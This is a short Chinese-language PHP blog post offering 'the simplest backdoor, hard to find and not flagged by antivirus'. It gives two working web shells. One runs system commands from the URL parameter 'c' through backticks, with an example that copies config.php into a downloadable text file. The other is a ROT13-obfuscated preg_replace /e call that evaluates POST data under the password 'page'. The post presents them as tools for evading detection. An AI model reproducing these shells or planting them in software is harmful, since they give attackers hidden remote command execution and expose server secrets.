博客主机
A-A+

PHP最简单的后门,且难查,不报毒!

2015年09月17日 PHP编程 暂无评论 阅读 695 次
博客主机

第一段

  1. <?php  
  2.     
  3. $c=urldecode($_GET['c']);if($c){`$c`;}//完整  
  4.     
  5. !$_GET['c']||`{$_GET['c']}`;//精简  
  6.     
  7. /******************************************************* 
  8.  * 原理:PHP中``符号包含会当作系统命令执行 
  9.  * 示例:http://host/?c=type%20config.php>config.txt 
  10.  *       然后就可以下载config.txt查看内容了! 
  11.  *       可以试试更变态的命令,不要干坏事哦! 
  12.  *******************************************************/  

第二段

  1. <?php    
  2. preg_replace("/[errorpage]/e",@str_rot13('@nffreg($_CBFG[cntr]);'),"saft");   
  3. ?>   
  4. 密码page  
标签:
博客主机

给我留言